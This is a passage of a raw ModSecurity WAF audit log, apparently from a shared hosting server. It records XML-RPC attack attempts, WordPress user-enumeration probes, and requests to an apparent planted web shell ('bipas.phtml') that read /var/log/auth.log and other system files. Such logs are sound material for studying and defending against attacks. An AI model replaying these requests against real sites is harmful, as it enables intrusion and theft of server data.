"155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7UkAGF7u34THrsb8uagAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996688098475 1004224 (- - -) Stopwatch2: 1749996688098475 1004224; combined=1718, p1=332, p2=1282, p3=0, p4=0, p5=103, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd73021b-Z-- --d6937e3a-A-- [15/Jun/2025:19:41:36.425017 +0530] aE7Ul1u1-lKBbvo2E9pQpQAAAAw 128.199.112.101 53822 127.0.0.1 7081 --d6937e3a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d6937e3a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d6937e3a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7Ul1u1-lKBbvo2E9pQpQAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996695387209 1037874 (- - -) Stopwatch2: 1749996695387209 1037874; combined=2417, p1=394, p2=1573, p3=62, p4=70, p5=196, sr=96, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d6937e3a-Z-- --998f9127-A-- [15/Jun/2025:19:41:55.787623 +0530] aE7UqzFH_cIWXKTtjcaqlAAAABY 3.210.29.96 36162 127.0.0.1 7081 --998f9127-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/gawk.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.210.29.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --998f9127-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3147 Connection: close Content-Type: text/html; charset=UTF-8 --998f9127-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/gawk.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7UqzFH_cIWXKTtjcaqlAAAABY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/gawk.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7UqzFH_cIWXKTtjcaqlAAAABY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749996715782989 4711 (- - -) Stopwatch2: 1749996715782989 4711; combined=2651, p1=425, p2=2032, p3=47, p4=41, p5=105, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --998f9127-Z-- --035f0d4e-A-- [15/Jun/2025:19:42:37.161428 +0530] aE7U1AGF7u34THrsb8uanQAAAAM 128.199.112.101 54338 127.0.0.1 7081 --035f0d4e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --035f0d4e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --035f0d4e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7U1AGF7u34THrsb8uanQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996756035455 1126030 (- - -) Stopwatch2: 1749996756035455 1126030; combined=2506, p1=427, p2=1671, p3=45, p4=78, p5=178, sr=110, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --035f0d4e-Z-- --de7dba56-A-- [15/Jun/2025:19:43:03.624036 +0530] aE7U74eMkDifvSpLI-IwlgAAAAQ 23.22.59.87 59250 127.0.0.1 7081 --de7dba56-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/auth.log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.22.59.87 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --de7dba56-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2944 Connection: close Content-Type: text/html; charset=UTF-8 --de7dba56-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7U74eMkDifvSpLI-IwlgAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749996783619925 4172 (- - -) Stopwatch2: 1749996783619925 4172; combined=2244, p1=375, p2=1711, p3=37, p4=45, p5=76, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de7dba56-Z-- --5b87662b-A-- [15/Jun/2025:19:43:16.643648 +0530] aE7U_AGF7u34THrsb8uarAAAAAM 54.147.238.89 36384 127.0.0.1 7081 --5b87662b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/ld.so.conf.d&viewfile=//etc/ld.so.conf.d/x86_64-linux-gnu.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.147.238.89 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5b87662b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3001 Connection: close Content-Type: text/html; charset=UTF-8 --5b87662b-H-- Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /etc/ld.so.conf.d/x86_64-linux-gnu.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7U_AGF7u34THrsb8uarAAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /etc/ld.so.conf.d/x86_64-linux-gnu.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7U_AGF7u34THrsb8uarAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749996796638499 5223 (- - -) Stopwatch2: 1749996796638499 5223; combined=2813, p1=435, p2=2166, p3=50, p4=44, p5=118, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5b87662b-Z-- --7b821b4f-A-- [15/Jun/2025:19:43:37.859501 +0530] aE7VEA2U8ofTdsKp_yhacQAAAAU 128.199.112.101 34896 127.0.0.1 7081 --7b821b4f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7b821b4f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7b821b4f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7VEA2U8ofTdsKp_yhacQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996816937160 922397 (- - -) Stopwatch2: 1749996816937160 922397; combined=2165, p1=349, p2=1412, p3=43, p4=77, p5=176, sr=95, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b821b4f-Z-- --7847047b-A-- [15/Jun/2025:19:44:38.049001 +0530] aE7VTTFH_cIWXKTtjcaq7gAAABY 128.199.112.101 34220 127.0.0.1 7081 --7847047b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7847047b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7847047b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7VTTFH_cIWXKTtjcaq7gAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996877132946 916113 (- - -) Stopwatch2: 1749996877132946 916113; combined=2499, p1=372, p2=1541, p3=42, p4=190, p5=223, sr=96, sw=131, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7847047b-Z-- --80079723-A-- [15/Jun/2025:19:45:38.136591 +0530] aE7ViXrzia-Xuz8LZxRZgAAAAAg 128.199.112.101 45298 127.0.0.1 7081 --80079723-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --80079723-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --80079723-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7ViXrzia-Xuz8LZxRZgAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996937219767 916892 (- - -) Stopwatch2: 1749996937219767 916892; combined=2731, p1=497, p2=1735, p3=48, p4=68, p5=227, sr=129, sw=156, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80079723-Z-- --1f425c10-A-- [15/Jun/2025:19:46:38.432481 +0530] aE7VxXrzia-Xuz8LZxRZlgAAAAg 128.199.112.101 43834 127.0.0.1 7081 --1f425c10-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 497 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1f425c10-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1f425c10-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7VxXrzia-Xuz8LZxRZlgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996997472777 959760 (- - -) Stopwatch2: 1749996997472777 959760; combined=2314, p1=380, p2=1535, p3=40, p4=53, p5=187, sr=111, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1f425c10-Z-- --35944b7e-A-- [15/Jun/2025:19:47:38.717069 +0530] aE7WATFH_cIWXKTtjcarMgAAABY 128.199.112.101 55632 127.0.0.1 7081 --35944b7e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --35944b7e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --35944b7e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7WATFH_cIWXKTtjcarMgAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997057645004 1072121 (- - -) Stopwatch2: 1749997057645004 1072121; combined=2431, p1=440, p2=1571, p3=45, p4=64, p5=195, sr=116, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --35944b7e-Z-- --d8d99503-A-- [15/Jun/2025:19:47:40.967690 +0530] aE7WBFu1-lKBbvo2E9pRSwAAAAw 141.94.192.177 47520 127.0.0.1 7081 --d8d99503-B-- GET ///wp-json/wp/v2/users/ HTTP/1.0 Host: www.bspsons.com X-Real-IP: 141.94.192.177 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 Referer: http://bspsons.com///wp-json/wp/v2/users/ Accept-Encoding: gzip --d8d99503-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --d8d99503-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.bspsons.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.bspsons.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.bspsons.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7WBFu1-lKBbvo2E9pRSwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997060517881 449934 (- - -) Stopwatch2: 1749997060517881 449934; combined=1967, p1=347, p2=1517, p3=0, p4=0, p5=103, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d8d99503-Z-- --b1b56d2a-A-- [15/Jun/2025:19:48:38.194735 +0530] aE7WPbQco3e4Gnif-OQhdgAAABg 128.199.112.101 44732 127.0.0.1 7081 --b1b56d2a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b1b56d2a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b1b56d2a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7WPbQco3e4Gnif-OQhdgAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997117231585 963206 (- - -) Stopwatch2: 1749997117231585 963206; combined=2306, p1=418, p2=1518, p3=42, p4=63, p5=165, sr=131, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b1b56d2a-Z-- --68f9873d-A-- [15/Jun/2025:19:49:39.089375 +0530] 